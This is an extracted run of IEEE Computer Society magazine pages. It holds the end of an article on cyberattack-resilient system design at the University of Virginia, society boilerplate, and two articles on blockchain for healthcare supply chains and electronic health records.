The identified problems can range from func-tions being implemented improperly, to deviations from the technical performance specifications, to loss of functions (note that the blue team is not asked to relate the problems of concern to cyberat-tacks, but to any functional issue associated with the system’s hardware, software or operational procedures). UVA’s CSRM research project included a case trial discussed next, for which the U.S. Army provided the blue team. The SE team is called upon to derive system-level descriptions of potential cyberattack-resilient solutions that would address the higher-consequence concerns expressed by the blue team. A critical aspect of the SE team’s effort is to utilize rapid prototyping as a mechanism for addressing the operational issues regarding the role of the human operators in reconfiguration decision making and execution of switchovers. To arrive at viable operational solutions, the SE team is expected to coordinate and adjust its resilience solutions based upon suggestions from the blue team.

For the use case trial, members of UVA and Virginia Commonwealth University (VCU) served as the SE team. To assure sufficient specificity in the resulting SE system descriptions, SysML, a formal approach


RESILIENT SECURITY

that employs available support tools for describing systems, is used. The use of such tools is an important ingredient of assuring that high-priority solutions will be properly understood by the red team and, if selected for implementation, designed as intended. The red team is provided with the SE team’s potential solution descriptions and is called upon to evaluate how each of them would potentially impact the decisions of cyberattackers, based upon the added complexity of attacks, extended time to implement and test attacks, cost of attacks, risk of discovery, and so forth.

The red team is also called upon to evaluate the potential effectiveness of the resilience solutions, compared to use of additional conventional cyber defense solutions, and to assess the potential for a cyberattack to disrupt the detection or reconfigura-tion functions of the potential resilience solutions.

An important aspect of CSRM is the use of exist-ing historical data bases, openly available through the MITRE Corporation, related to cyberattacks and their causes and the use of a UVA/VCU set of analy-sis tools intended to support the red team’s analy-sis efforts. The red team members combine their analyses to prioritize the SE team’s suggested resil-ience solutions based upon the influence on attack likelihoods and the advantage offered compared to extended use of cyberattack defense solutions. The SE team uses the red team results to modify its pro-posed designs and to suggest a prioritization based upon the integrated assessments of the blue and red teams.

The three teams together finalize their inte-grated prioritization, and the SE team modifies its SysML system description of the recommended, highest-priority resilience solutions. This result, com-bined with cost assessments for each of the consid-ered solutions, provides a basis for decision making regarding implementation of cyberattack resilience design features.

ROLE OF SYSTEM OPERATORSAn important aspect of designing cyberattack-resilient systems relates to the roles of the human system oper-ators. An important aspect of the UVA research effort required the development of prototype resilient sys-tems, including systems for UAVs and police cars. The prototype systems included the development of

reconfiguration procedures for operators to follow in response to sentinel alerts.

Based upon use trials, it became apparent that uncertainties related to the reasons for the cyber-attack can greatly influence the reconfiguration responses of operators. For example, consider a cyber-attack that would change navigation waypoints for a UAV conducting a search and rescue mission. Possi-bilities related to the purpose of the attack can range from the attacker wishing to 1) disrupt that search and rescue mission, 2) disrupt the air traffic control system in the area surrounding the UAV, or 3) steal the UAV by directing it to a specific location.

The best response to the detected attack could be different depending upon the actual purpose of the attack, and the human operators may have a broader context of the risk posed by the detected attack than the sentinel that made the detection. UVA’s experimental research included the involve-ment of Air Force pilots remotely controlling UAVs and ground-based vehicles in simulated situations. Results have shown that operators can significantly delay resilience-related responses due to their uncertainty about how best to respond, and, in general, they are not prepared to confidently select sentinel-recommended solutions.12

To date, the experiments have proven to be very useful in illuminating issues that need attention related to operator response to detected cyberat-tacks, but the research has not yet matured to the point where specific human/machine team solution concepts are ready for recommendation. In addition to receiving continued research attention, over time, feedback from actual operational situations will need to be gathered to develop acceptable arrangements for operators to participate in system reconfiguration decision making related to cyberattacks.

Based upon the results gathered from the eight years of study conducted by UVA’s cyberattack

resilience research team, the opportunity to employ cyberattack resilience capabilities in cyberphysical systems appears to be a promising complement to cyber defense solutions. It has been shown that sim-pler sentinel-based solutions can be candidates for immediate trial implementations, and it is suggested that this would be a productive step for introducing


RESILIENT SECURITY

cyberattack resilience solutions into practice. However, while the UVA research efforts have dem-onstrated how resilience solutions can provide important benefits, continued research is needed. Research needs to include:

1. continued identification of cost-effective reusable resilience design patterns

2. development of analysis tools that support risk-related selection of solutions for employ-ment as well as test and evaluation methodolo-gies for candidate solutions

3. experimental-based efforts related to address-ing operator roles and performance in deci-sions related to system reconfiguration

4. broadening resilience solutions to address information systems as well as physical systems

5. defining and implementing field data collection and evaluation methodologies to support improvement of machine algorithms and opera-tor processes.

ACKNOWLEDGMENTSThis material is based, in part, upon work supported by the Stevens Institute of Technology through the Systems Engineering Research Center (SERC) under U.S. Department of Defense (DOD) Contract HQ0034-13-D-0004. SERC is a federally funded Univer-sity Affiliated Research Center managed by Stevens Institute of Technology. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessar-ily reflect the views of the DOD.

REFERENCES1. N. Falliere, L. O. Murchu, and E. Chien, “W32.Stuxnet

dossier,” Symantec Corporation. Mountain View, CA, 2011. [Online]. Available: https://www.symantec.com /content/en/us/enterprise/media/security_response /whitepapers/w32_stuxnet_dossier.pdf

2. C. G. Rieger, Di Gertman, and M. A. McQueen, “Resilient control systems: Next generation design research,” in Proc. 2nd Conf. Human Systems Interactions, 2009, pp. 632–636.

3. R. A. Jones and B. M. Horowitz, “System-aware cyber security architecture,” in Proc. IEEE 2011 Eighth Int.

Conf. Information Technology: New Generations, pp. 914–917.

4. M. Franz, “Making multivariant programming practical and inexpensive,” IEEE Security Privacy, vol. 16, no. 3, pp. 90–94, May/June 2018.

5. M. Albanese and S. Jajodia, “Defending from stealthy botnets using moving target defenses,” IEEE Security Privacy, vol. 16, no. 1, pp. 92–97, Jan./Feb. 2018.

6. G. L. Babineau, R. A. Jones, and B. M. Horowitz, “A system-aware cyber security method for shipboard control systems with a method described to evaluate cyber security solutions,” IEEE Int. Conf. Technolo-gies for Homeland Security (HST), 2012. doi: 10.1109 /THS.2012.6459832.

7. B. T. Carter, G. Bakirtzis, C. R. Elks, and C. H. Fleming, “A systems approach for eliciting mission-centric security requirements,” Annu. IEEE Int. Systems Conf. (SysCon), 2018, pp. 1–8.

8. B. M. Horowitz, “Cybersecurity for unmanned aerial vehicle missions,” AFCEA SIGNAL, Apr. 2016, pp. 40–43.

9. K. J. Higgins, “State trooper vehicles hacked,” Dark Reading, Sept. 2015. [Online]. Available: https: //www.darkreading.com/attacks-breaches/state -trooper-vehicles-hacked-/d/d-id/1322415?

10. C. Gay, B. Horowitz, P. Bobko, J. Elshaw, and I. Kim, “Operator suspicion and decision responses to cyber-attacks on unmanned ground vehicle systems,” Proc. Hum. Factors Ergon. Soc. Annu. Meet., vol. 61, no. 1, pp. 226–230, Sept. 28, 2017. doi: 10.1177 /1541931213601540.

11. Draper, “Inherently secure pocessor.” Accessed on: Oct. 2019. [Online]. Available: https://www .draper.com /explore-solutions/inherently-secure-processor.

12. C. Gay, B. Horowitz, J. J. Elshaw, P. Bobko, and I. Kim, “Operator suspicion and human–machine team performance under mission scenarios of unmanned ground vehicle operation,” IEEE Access, vol. 7, pp. 36,371–36,379, 2019. doi: 10.1109/ACCESS .2019.2901258.

BARRY M. HOROWITZ is the Munster Professor of Systems Engineering at the University of Virginia, Charlottesville. His research interests include system architecture and design. Contact him at h8e@virginia .edu.

PURPOSE: The IEEE Computer Society is the world’s largest association of computing professionals and is the leading provider of technical information in the field.

MEMBERSHIP: Members receive the monthly magazine Computer, discounts, and opportunities to serve (all activities are led by volunteer members). Membership is open to all IEEE members, affiliate society members, and others interested in the computer field.

COMPUTER SOCIETY WEBSITE: www.computer.org

OMBUDSMAN: Direct unresolved complaints to [email protected].

CHAPTERS: Regular and student chapters worldwide provide the opportunity to interact with colleagues, hear technical experts, and serve the local professional community.

AVAILABLE INFORMATION: To check membership status, report an address change, or obtain more information on any of the following, email Customer Service at [email protected] or call +1 714 821 8380 (international) or our toll-free number, +1 800 272 6657 (US):

• Membership applications• Publications catalog• Draft standards and order forms• Technical committee list• Technical committee application• Chapter start-up procedures• Student scholarship information• Volunteer leaders/staff directory• IEEE senior member grade application (requires 10 years

practice and significant performance in five of those 10)

PUBLICATIONS AND ACTIVITIESComputer: The flagship publication of the IEEE Computer Society, Computer publishes peer-reviewed technical content that covers all aspects of computer science, computer engineering, technology, and applications.

Periodicals: The society publishes 12 magazines and 18 journals. Refer to membership application or request information as noted above.

Conference Proceedings & Books: Conference Publishing Services publishes more than 275 titles every year.

Standards Working Groups: More than 150 groups produce IEEE standards used throughout the world.

Technical Committees: TCs provide professional interaction in more than 30 technical areas and directly influence computer engineering conferences and publications.

Conferences/Education: The society holds about 200 conferences each year and sponsors many educational activities, including computing science accreditation.

Certifications: The society offers three software developer credentials. For more information, visit www.computer.org/certification.

BOARD OF GOVERNORS MEETING

24 – 25 September 2020 in McLean, Virginia, USA

EXECUTIVE COMMITTEE

revised 1 May 2020

President: Leila De Floriani President-Elect: Forrest Shull Past President: Cecilia Metra First VP: Riccardo Mariani; Second VP: Sy‐Yen Kuo Secretary: Dimitrios Serpanos; Treasurer: David Lomet VP, Membership & Geographic Activities: Yervant ZorianVP, Professional & Educational Activities: Sy-Yen Kuo VP, Publications: Fabrizio Lombardi VP, Standards Activities: Riccardo MarianiVP, Technical & Conference Activities: William D. Gropp 2019–2020 IEEE Division VIII Director: Elizabeth L. Burd 2020-2021 IEEE Division V Director: Thomas M. Conte 2020 IEEE Division VIII Director-Elect: Christina M. Schober

BOARD OF GOVERNORS Term Expiring 2020: Andy T. Chen, John D. Johnson, Sy-Yen Kuo, David Lomet, Dimitrios Serpanos, Hayato YamanaTerm Expiring 2021: M. Brian Blake, Fred Douglis, Carlos E. Jimenez-Gomez, Ramalatha Marimuthu, Erik Jan Marinissen, Kunio UchiyamaTerm Expiring 2022: Nils Aschenbruck, Ernesto Cuadros‐Vargas, David S. Ebert, William Gropp, Grace Lewis, Stefano Zanero

EXECUTIVE STAFFExecutive Director: Melissa A. RussellDirector, Governance & Associate Executive Director: Anne Marie KellyDirector, Finance & Accounting: Sunny HwangDirector, Information Technology & Services: Sumit Kacker Director, Marketing & Sales: Michelle TubbDirector, Membership Development: Eric Berkowitz

COMPUTER SOCIETY OFFICESWashington, D.C.: 2001 L St., Ste. 700, Washington, D.C. 20036-4928; Phone: +1 202 371 0101; Fax: +1 202 728 9614; Email: [email protected] Alamitos: 10662 Los Vaqueros Cir., Los Alamitos, CA 90720; Phone: +1 714 821 8380; Email: [email protected]

MEMBERSHIP & PUBLICATION ORDERS Phone: +1 800 678 4333; Fax: +1 714 821 4641; Email: [email protected]

IEEE BOARD OF DIRECTORSPresident: Toshio FukudaPresident-Elect: Susan K. “Kathy” LandPast President: José M.F. MouraSecretary: Kathleen A. KramerTreasurer: Joseph V. LillieDirector & President, IEEE-USA: Jim Conrad Director & President, Standards Association: Robert S. Fish Director & VP, Educational Activities: Stephen Phillips Director & VP, Membership & Geographic Activities: Kukjin ChunDirector & VP, Publication Services & Products: Tapan Sarkar Director & VP, Technical Activities: Kazuhiro Kosuge


EDITOR: Jinan Fiaidhi, Lakehead University, [email protected]

DEPARTMENT: EXTREME AUTOMATION

EDI with Blockchain as an Enabler for Extreme AutomationJinan Fiaidhi and Sabah Mohammed, Lakehead University

Sami Mohammed, University of Victoria

E xtreme automation is the latest initiative to have emerged from several “hands-free” inno-vations like autonomous ships and subma-

rines, autonomous passenger aircraft, drone freight delivery, autonomous robotic surgery, automated knowledge discovery, currier package delivery, and self-writing software. In such markets, every company is a software company in some way and customers expect software to perform flawlessly and effectively. When it doesn’t, the brand suffers.

In the supply chain, everything from attracting cus-tomers and securing deals to managing transactions and follow-ups based on B2C (business-to-consumer) or B2B (business-to-business) platforms needs to be transparent, secure, and able to be changed on the fly. Everything needs to happen at lightning speed because winning market share requires the use of highly dynamic, fast-moving environments. Healthcare supply-chain management deals with the informa-tional and physical resources (such as manufacturing, procuring, storing, and transporting different product types such as surgical supplies, medical devices, and pharmaceuticals) needed for delivering services to the end customer (see Figure 1).

According to a recent Allied Market Research report,1 the healthcare supply-chain management market is segmented based on delivery model, soft-ware, hardware, end customer, and geography. Based on the delivery model, the market segments covered in the report are cloud-based, web-based, and on prem-ise. In addition, healthcare supply-chain management software includes supplier management software, procurement software, transportation management software, and others. The hardware segment consists of barcode and RFID systems and others. End custom-ers served by the market consist of healthcare provid-ers, suppliers, distributors, and others. The market for

healthcare supply-chain management is segmented based on geography: North America; Europe; Latin America, Middle East, and Africa (LAMEA); and Asia Pacific. Similar segmentations are also seen in other industries, as supply-chain management is more complex in the era of globalization and extreme automation.

There are many factors that need to be consid-ered and must be part of more effective solutions, like understanding that outsourcing, product per-sonalization, authentication, and transportation are all part of the new business reality. In this new era, supply-chain visibility must be carefully defined in a consistent way across industries. ERP (enterprise resource planning)-to-ERP connectivity is not the answer when electronic data interchange (EDI) is the only workhorse of visibility. B2B and B2C efforts are now three decades old, yet the primary EDI mecha-nisms are based on fragmented and manual efforts. However, trying to install a new ERP system and a new EDI system at the same time doesn’t double risks—it squares them.2 Business leaders in the era of extreme automation need to pave a new path to solve these new challenges.

EDI STRENGTHS AND WEAKNESSES

EDI is the universal language for B2B and B2C com-munication, and has changed the way that companies share information, ensuring that data isn’t compro-mised by human error. EDI has become the common language for interchanging files and information such as product activity data, purchase orders, and ship-ment and billing notices. Rather than sending faxes or emails for each individual event, EDI allows comput-ers to communicate directly with each other, ensur-ing greater accuracy and instantaneous notice.3 EDI


vol. 20, no. 4, 2018


can scale to include different collaborating partners by introducing a portal or cloud layer that partners can access securely without a data-integration solu-tion. An example of such a solution is the Edicom por-tal (see Figure 2).

However, businesses are moving away from the standardization principles that brought forth greater efficiency in the retail industry and inadvertently introduced more work for vendors that must collect data from numerous retailers. Improving supply-chain visibility is critical as supply chains grow more com-plex with more collaborating partners. Having differ-ent vendor portals will damage the efficiency of B2B and B2C communicating networks. EDI as a universal

language is a slow-moving ship and there are no ben-efits for a single company in a partner network to change unless other trading partners also follow. This was one of the main reasons XML never really took off, although it was (and still is) a far superior format for electronic business transactions than the clunky 30-year-old flat-file formats used by traditional EDI standards, such as EDIFACT and ANSI X12.4

EDI needs a distributed ledger technology (DLT) for shared and synchronized digital data that is geo-graphically spread across multiple sites, countries, or institutions. With a DLT, there is no central administra-tor or centralized data storage. Without DLT, EDI mes-sages will have major difficulties mapping messages

FIGURE 1. End-to-end healthcare supply chain.

FIGURE 2. Scaling electronic data interchange (EDI) for collaborating partners through the use of web portals (Source: www .edicomgroup.com/solutions/edi/components/partner_web_portal.html)


EXTREME AUTOMATION

between partners. Each message has many sectors that, arranged in a particular way, constitute the “map” for the message. The segments are populated with data, such as customer number, product number, gross price, and net price. There are numerous opportunities for error—if a product number is changed on the send-ing or receiving end, data is entered incorrectly, new master data isn’t uploaded into someone’s system, a suffix or prefix is added to a value in one of the sec-tions, a trading partner changes part of the map and fails to communicate the change, or a required field is blank, other partners will not be informed. Thus, new methods are needed to keep these records—ranging from emails to spreadsheets to third-party services—in sync.

EDI cannot support the complex supply-chain processes of today because the data transfer between the various ERP systems opens up potentially critical situations. Customers and suppliers need a shared view of the actual supply situation and an automated early detection system. This will efficiently control organizations’ supply chains, enabling them to col-laboratively resolve identified problems and avoid costly bottlenecks. Trust is key to the success of global cross-organization collaboration, and trust comes with transparent processes. DLT promises to share, facilitate, verify, or enforce the negotiation or performance of a contract. This is why a DLT system is needed along with an existing EDI.

THE BLOCKCHAIN DLT SYSTEMBlockchain systems form a decentralized ledger, a type of database that is stored in several different physi-cal locations. Processing is distributed among multi-ple stakeholders, and each party receives real-time updates in a completely secure system. These aspects make a decentralized ledger an ideal system for the creation, issuing, and execution of contracts that can

help protect business models and enable collabora-tion.5 However, blockchain is not an alternative to EDI systems, although it offers a way for trading partners to communicate quickly and clearly without the risk of errors or repudiation.

Consider how transactions take place through EDI systems, which typically involve a buyer, a seller, and a third-party logistics provider. EDI system transactions hinge upon one-way, point-to-point communication, meaning that two of the three parties can exchange messages with one another, but the third party is left out. Because blockchain is a shared ledger, everyone can see what is going on. Disputes would not hap-pen, repudiation would be unnecessary, and sharing information would be much more efficient.6 Another advantage of blockchain technology is the security and integrity of distributed networks. Although it started as a disrupting technology in the financial industry for the decentralized digital currency Bitcoin, blockchain finds more and more use cases in other industries such as energy and freight.7

A study by IBM found that 16 percent of surveyed healthcare executives had solid plans to implement a blockchain solution this year, while 56 percent expected to by 2020.8 Healthcare companies, tech innovators, and the rest of the healthcare industry are grappling with what is possible now and what block-chain could solve in the future. The overall vision for blockchain to disrupt healthcare in the future would be to create a common database of health information that physicians and providers could access no matter what electronic medical system they used, provide higher security and privacy, decrease the admin time for physicians so they have more time to spend on patient care, and improve the sharing of research results to facilitate new treatment therapies.9

ADVANTAGES OF BLOCKCHAIN Blockchain won’t be a cure-all for the industry today, but it would certainly be a step in the right direction. The healthcare industry is drowning in data—clinical trials, patient medical records, complex billing, med-ical research, and more. Adoption and implementa-tion of blockchain will be an evolution over time as blockchain applications are vetted and adopted and as the industry comes together to solve collabora-tion and governance issues. As it always is with new

TRUST IS KEY TO THE SUCCESS OF GLOBAL CROSS-ORGANIZATION COLLABORATION, AND TRUST COMES WITH TRANSPARENT PROCESSES.


EXTREME AUTOMATION

technologies, the full possibility of what might tran-spire in the future is unknown at this time. However, there are many advantages of using blockchain for an industry like healthcare. Among these advantages are the following.

› Transparency and collaboration. Blockchain is a solid mechanism for documenting a transac-tion across the supply chain and sharing it with stakeholders. The system works without a central repository or single administrator.

› Medical data management. Blockchain has great potential to link medical data across systems and stakeholders. An example of the success of blockchain in managing healthcare data is the MedRec system.10 MedRec intends to improve electronic medical records and allow patients’ records to be accessed securely by any provider who needs it. The goal is to give patients and their healthcare providers one-stop access to their entire medical history across all providers they have ever seen. Additionally, if patients wish to grant researchers access to their personal medical records, the data would be provided anonymously to be used for research, which could make medical break-throughs happen faster.

› Scalability and availability. Blockchain 2.0 is solving the scalability issues for writing transactions. Anyone worldwide can access the decentralized datasets.

› Security and privacy. Establishing a trust network depends on the healthcare system as an intermediary to establish point-to-point sharing and bookkeeping of the exchanged data. A node does not have to reveal the physical identity of the person or organization and the payload can have a digital signature with private cryptographic keys.

› Patient–provider relationship contract. This contract links two nodes in the system, where one node stores and manages medical records for the other. This relationship could exist between a particular care provider and a patient, but extends to cover any pairwise data steward-ship interaction.

› Summary contract. This serves as a trail of

breadcrumbs, where each participant in the sys-tem can locate a summary of their relationships with other participants. The summary contract encodes a list of references to patient–provider relationship contracts, showing current and previous engagements with other nodes on the system. Each relationship also stores a “status” variable, indicating when the relationship was established and whether it has been approved by the patient.

› Reduced transaction costs. The use of near-real-time processing would make the system more efficient.

› Innovation. The dominance of open source models is a driver for computing innovation. IBM, Microsoft, and Bitcoin published their solutions on the open source repository Github. Blockchain-as-a-Service solutions like Microsoft Azure make it easy for anyone in the world to use the service.

SMART CONTRACTSBlockchain uses a smart contract, which stores the ground rules of the contract, automatically executes the contract, verifies its compliance, and evaluates the outcome without the need for a third party. Smart con-tracts are visible to all users and remove the need for a middleman. The supply-chain industry needs smart contracts for the next generation of global distribution systems. As an example, a smart contract starts when a patient schedules surgery. At this point, the contract performs the initial setup of the blockchain and mines for other related caregiver nodes. Caregiver partners join the private blockchain, where no one person is the owner of the data and all partners are part of a con-sortium or community of practice. All partners can write and read data into or from the blockchain. When partner A writes data into the blockchain, that data can be validated by the consortium. Once the data is validated it can be shared with other nodes including external repositories. A smart contract is pre-written code that utilizes both EDI and blockchain commu-nication protocols. Figure 3 illustrates the EDI block-chain for a surgery supply-chain cycle.

Generally speaking, if a business can satisfy the checklist below, it has a good use case for EDI and blockchain.11


EXTREME AUTOMATION

› Multiple parties need to be able to view, and possibly edit, the same data.

› Parties form a supply chain with the ability to communicate with third parties.

› There is a lack of trust between parties trying to conduct transactions.

› Several of the transactions are sequential in the supply chain, and all parties conducting the transactions need to know the interdependen-cies of those transactions.

› Middlemen are in the ecosystem mainly because of the lack of trust among the parties that need to conduct transactions.

› Parties would gain financially if transaction times can be reduced.

The use of smart contracts will allow the advance-ment of multiple services that were suffering from bottleneck delays because of complex logistics and privacy protocols. Suppose a patient has agreed that their clinical or medical data can be used by anyone in clinical research who can satisfy a smart contract by putting this data into a public blockchain. The enforce-ment of the smart contract can provide add-on services to facilitate collaboration and interoperability, similar to interoperable electronic healthcare record systems

like the Fast Healthcare Interoper-ability Resources (FHIR) system.12 In this case, the smart contract would include:

› upfront micro-payment for the access,

› requirement for escrow of the crypto coin to be unlocked to the patient if other terms are violated,

› terms of protection of the data, › kinds of clinical trials allowed

(for example, heart conditions but not brain),

› agreement to keep all research public,

› agreement to contact patient if patient could benefit from new treatment detected,

› agreement to contact patientif some treatable medical condition not previ-ously known is discovered, and

› agreement to not contact patient if a terminal condition is detected.

A clinical trial firm that meets these requirements would satisfy the contract and gain access to the data. If the firm violated any of the terms, the smart contract would automatically transfer the escrow coin to the patient. The possibility of using smart contracts with patients’ medical records gives patients control over their data.

According to Forbes, pharmaceutical companies incur an estimated annual loss of $200 billion due to counterfeit drugs globally.13 Using smart contracts, it is possible to trace drugs over their whole lifecycle. Each ingredient and substance is numbered and tracked with geographic and other relevant information. The tracking data is then added to the blockchain (only the metadata is put in the blockchain for efficiency reasons).

CONCLUSIONAlthough blockchain has enormous potential, it is important to remember that no new technol-ogy succeeds with the “rip-and-replace” method.

FIGURE 3. Blockchain with EDI for the surgery supply chain.


EXTREME AUTOMATION

Organizations using blockchain will have a greater impact if they augment existing, well-established technologies such as EDI systems. Using smart con-tracts that take into account legacy protocols like EDI and blockchain will benefit the ecosystem of every industry, including healthcare. The healthcare indus-try will need to adapt to the changing care delivery and the new financial model as it will save many billions of dollars, according to recent industry survey.14,15

REFERENCES1. Healthcare Supply Chain Management Market By

Software (Supplier Management Software, Transporta-tion Software And Procurement Software), Hardware (System, Barcode And RFID), Delivery Model (On Premise, Cloud Based And Web Based)—Global Opportunity Analysis And Industry Forecast, 2017-2023, report, Allied Market Research, 2017; www.alliedmarketresearch .com/healthcare-supply-chain-management-market.

2. M. Torman, “‘EDI’ Comes Before ‘ERP’,” Cleo, blog, 17 December 2012; www.cleo.com/blog/edi-comes -before-erp.

3. “The Reasons Of EDI Failure,”GeoViz, blog, 1 August 2015; www.geo-viz.com/blog/the-reasons-of-edi-failure.

4. M. Wallgren, “EDI And Blockchain—A Match Made In Heaven?,” LinkedIn, blog, 26 March 2018; www.linkedin .com/pulse/edi-blockchain-match-made-heaven -mathias-wallgren.

5. “Smart Contracts And Blockchain In The Electronics Industry,”Orbweaver, blog, 19 January 2018; www .orbweaver.com/blog/smart-contracts-and-blockchain -in-the-electronics-industry.

6. B. Lester, “How Blockchain Technology Augments EDI Systems,” Remedi, blog, 15 March 2018; www.remedi .com/blog/how-blockchain-technology-augments -edi-systems.

7. M. Buchhorn-Roth, “Blockchain And EDI For Secure Data Exchange In Supply Chains,” LinkedIn, blog, 14 November 2018; www.linkedin.com/pulse/blockchain -edi-secure-data-exchange-supply-chains-buchhorn-roth.

8. H. Fraser, “How Blockchains Can Provide New Benefits For Healthcare,” IBM, blog, 20 February 2017; www.ibm .com/blogs/think/2017/02/blockchain-healthcare.

9. B. Marr, “This Is Why Blockchains Will Transform Health-care,” Forbes, blog, 29 November 2017; www.forbes .com/sites/bernardmarr/2017/11/29/this-is-why -blockchains-will-transform-healthcare/#1593b3381ebe.

10. A. Ekblaw et al., A Case Study For Blockchain In Health-care: ‘MedRec’ Prototype For Electronic Health Records And Medical Research Data, white paper, August 2016; www.healthit.gov/sites/default/files/5-56-onc _blockchainchallenge_mitwhitepaper.pdf.

11. P. Srinivasan, “Healthcare Blockchain: How Smart Contracts Could Revolutionize Care Delivery,” Prolifics, blog, 2017; www.prolifics.com/blog/healthcare -blockchain-how-smart-contracts-could-revolutionize -care-delivery.

12. J. Moehrke, “Healthcare Blockchain—Big-Data Pseud-onyms On FHIR,” Healthcare Exchange Standards, blog, 18 May 2016; https://healthcaresecprivacy.blogspot .com/2016/05/healthcare-blockchain-big-data.html.

13. J. Moehrke, “Healthcare Use Of Blockchain Thru Creative Use Of Smart-Contracts,” Healthcare Exchange Standards, blog, 10 November 2017; https://healthcaresecprivacy.blogspot.com/2017/11 /healthcare-use-of-blockchain-thru.html.

14. R. Das, “Does Blockchain Have A Place In Healthcare?,” Forbes, blog, 8 May 2017; www.forbes.com/sites /reenitadas/2017/05/08/does-blockchain-have-a -place-in-healthcare.

15. Blockchain: A Healthcare Industry View, Capgemini, 2017; www.capgemini.com/wp-content/uploads/2017/07 /blockchain-a_healthcare_industry_view_2017_web.pdf.

JINAN FIAIDHI is a full professor and professional engineer with the Department of Computer Science and founder of the Smart Health FabLab at Lakehead University. She is an adjunct research professor at the University of Western Ontario, editor in chief of the new IGI Global International Journal of Extreme Automation in Healthcare, and chair of Big Data for eHealth with IEEE Communications Society. Contact her at [email protected].

SABAH MOHAMMED is a full professor and professional engineer with the Department of Computer Science and co-founder of the Smart Health FabLab at Lakehead Univer-sity. He is also an adjunct professor at the University of West-ern Ontario and chair of Smart and Connected Health with IEEE Communications Society. Contact him at mohammed @lakeheadu.ca.

SAMI MOHAMMED is a graduate student in the Computer Science Department at the University of Victoria. Contact him at [email protected].


EDITOR: Jeffrey Voas, NIST, [email protected]

DEPARTMENT: CYBERTRUST

Blockchain and Electronic Healthcare RecordsNir Kshetri, University of North Carolina at Greensboro

There is a growing need to both secure patient health data from unauthorized breaches and at the same time make access to such data easier for patients. Blockchain may provide a solution.

C yberattacks against healthcare providers pose serious concerns. In 2015 alone, data breaches in healthcare exceeded 112 million

records.1 Current infrastructure cannot guarantee the privacy and security of patient data, and the failure to prevent access to healthcare information by unau-thorized persons can harm patients.

The current model of handling electronic health-care records (EHRs) presents yet another problem: healthcare organizations have shown a tendency to act as custodians or stewards of patient data. This leads to inefficiency and delay in patient care. For instance, a patient’s treatment may be delayed simply because medical information sent from one service provider does not reach another in a timely manner.

Blockchain may offer a solution for addressing cur-rent EHR practice limitations. Blockchain initiatives have been implemented by governments, the private sector, and public–private partnership projects. The U.S. Food and Drug Administration (FDA) and IBM Watson Health have teamed up to investigate the potential benefits of blockchain in healthcare; initial efforts have focused on oncology-related data and a blockchain framework.

Blockchain enables the collection of data from a variety of sources and keeps those data in an audit trail of transactions. Blocks hold transaction and other data, and the accountability and transpar-ency of transactions are maintained during this data-exchange process. The FDA and IBM believe that

blockchain can support the exchange of data from multiple sources on agreed-to terms and for purposes that a patient approves of and consents to. These terms may include EHRs, clinical trials, genomic data, and information gathered from new sources, such as mobile devices, wearables, and Internet of Things devices.2

In the blockchain world, permissionless and permissioned chains exist. In a permissionless block-chain such as the open-platform bitcoin, anyone can join. Conversely, private or permissioned blockchains are restrictive, and access must be granted by some authority (e.g., https://www.americanbanker.com /opinion/a - p ub l ic - or- p r i vate - b l o ckcha in - n e w -ethereum-project-could-mean-both). Permissioned blockchains, which are more effective in sharing and managing EHRs, make it possible to share real-time data among participants of healthcare systems and conduct secure transactions. After a transaction is completed by consensus, a permanent record is pro-duced and added to the existing blockchain as a new block (https://tinyurl.com/ycuvnrxw).

In this article, we look at the possible roles of blockchain in strengthening the security and privacy of EHRs and improving efficiency. However, blockchain enforces transparency, which may jeopardize privacy without the proper design considerations.

CHALLENGES OF THE CURRENT EHR APPROACH

Current EHR models present problems providing effi-cient healthcare and guaranteeing the security and privacy of patient data. Several of these problems are described in the following.


vol. 51, no. 12, 2018

Digital Object Identifier 10.1109/MC.2018.2880021 Date of publication: 5 February 2019


Data storageCurrent models rely on passwords containing shared secrets that are exchanged and stored on poten-tially insecure clouds. This approach has led to well-publicized cyberdisasters, such as one in Decem-ber 2014, where hackers broke into the servers of U.S. health insurer Anthem and stole sensitive informa-tion on 80 million customers and employees.3 Such a breach is less likely to occur in a blockchain model because data are not centrally stored.

Data sharingIn a nonblockchain world, healthcare organizations typically follow three models to facilitate the interop-erability of medical data: push, pull, and view.4 In a push model, medical information is sent from one pro-vider to another (e.g., from an emergency room physi-cian to a primary care doctor). In a pull model, a pro-vider asks another provider for information (e.g., a cardiothoracic surgeon consulting with a primary care doctor). Finally, in the view model, a provider looks at another provider’s patient record. For example, a cardi-ologist may examine a patient X-ray taken at an urgent care center.

Access to healthcare data must be accompanied by obligations to the data. It is important for health-care companies handling identifiable information to structure such obligations by associating metadata (i.e., information about information) using data sets.5 In the current infrastructure, this is more easily said than done. A major drawback of the models describing patient data are that they are not audited in a stan-dardized way. The lack of audit trails means that there is no guarantee of data integrity from the point of data generation to the point of data usage, thus making it difficult to identify the perpetrators of data breaches. Some hospitals still rely on paper medical records and even paper towels.

Fraud is rampant in the medical industry. There have been instances of employees stealing patients’

personal data and misusing them (https:// tinyurl.com /y7b8rfta) as well as cases of fraudulent claims submit-ted to insurance providers using falsified patient medi-cal information and fake identities of doctors. In one scam, employees and doctors at a Long Island-based medical practice defrauded Medicare and Medicaid of US$50 million over a 12-year period by submitting bogus healthcare claims using patients’ EHRs (https: //tinyurl.com/y9lrhaqt).

Current healthcare systems also fail patients when it comes to informed consent (https://tinyurl.com /yclk4lxd). In the pull model, consent often occurs on an informal and ad hoc basis. Due to time constraints, doctors are often unable to help patients understand the processes related to consent. As a result, patients may not know what questions or whom to ask. It may also not be possible for patients to receive straightfor-ward answers. While patients have the right to stipu-late with whom their information may be exchanged, some healthcare organizations lack the capacity to record and implement such stipulations.

EfficiencyWith respect to efficiency, current practice leaves a great deal to be desired. For instance, in the push model, if a patient is transferred to a different hospital, the new hospital may not be able to access the data “pushed” from the first hospital. Patients often feel the frustration of repeatedly supplying the same infor-mation to different healthcare providers or different people associated with the same healthcare provider (https://tinyurl.com/y7x83a87).

Current approaches fail to manage medical records generated by multiple healthcare institutions. Because data are scattered across various medical institutions, patient data may become lost (https: //tinyurl.com/y7x83a87).

Regulations and policies governing these approaches vary greatly across jurisdictions based on inter alia, local practice, and national privacy


CYBERTRUST

policy enforcement. In the United States, laws vary with respect to whether a consent form is required to disclose patient records, the types of medical records patients can access, and procedures for providing patient records to a third party (http://www.apa.org /monitor/jan03/hipaa.aspx).

